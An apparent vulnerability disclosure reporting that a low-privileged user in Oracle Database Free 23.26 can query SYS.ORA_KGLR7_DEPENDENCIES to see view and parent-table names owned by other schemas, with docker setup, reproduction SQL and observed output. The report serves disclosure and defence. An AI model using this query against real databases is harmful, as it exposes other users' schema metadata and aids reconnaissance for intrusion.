Summary
A low-privileged user can query the view SYS.ORA_KGLR7_DEPENDENCIES to see metadata (parent table + view name) of views owned by other users. This bypasses the expected data dictionary privilege checks and reveals object relationships across schemas.
Environment
docker Image: container-registry.oracle.com/database/free:latest
version: Oracle AI Database 26ai Free Release 23.26.0.0.0
Reproduction
-- 1. Start the Oracle Database
-- (e.g. docker run -d --name oracle-free -p 1521:1521 -e ORACLE_PWD=123456 container-registry.oracle.com/database/free:latest)
-- 2. Connect as SYSTEM: create private objects
-- (e.g. docker exec -it oracle-free sqlplus SYSTEM/123456@//127.0.0.1:1521/FREEPDB1)
CREATE USER GUEST IDENTIFIED BY 123456;
GRANT CREATE SESSION TO GUEST;
CREATE TABLE private_t1 (x INT);
CREATE VIEW private_v1 AS SELECT * FROM private_t1;
-- 3. Connect as low-priv user
-- (e.g. docker exec -it oracle-free sqlplus GUEST/123456@//127.0.0.1:1521/FREEPDB1)
SELECT * FROM session_privs;
SELECT * FROM ALL_OBJECTS WHERE OBJECT_NAME = 'PRIVATE_V1';
SELECT PARENT_NAME, NAME FROM SYS.ORA_KGLR7_DEPENDENCIES WHERE OWNER = 'SYSTEM' AND NAME = 'PRIVATE_V1';
Observed result
The output of low-priv user is:
SQL> SELECT * FROM session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
SQL> SELECT * FROM ALL_OBJECTS WHERE OBJECT_NAME = 'PRIVATE_V1';
no rows selected
SQL> SELECT PARENT_NAME, NAME FROM SYS.ORA_KGLR7_DEPENDENCIES WHERE OWNER = 'SYSTEM' AND NAME = 'PRIVATE_V1';
PARENT_NAME NAME
--------------- ---------------
PRIVATE_T1 PRIVATE_V1
Expected result
A user without dictionary access should not see dependencies of objects they do not own (such as the result of ALL_OBJECTS). The query of SELECT FROM SYS.ORA_KGLR7_DEPENDENCIES WHERE OWNER … should return no rows.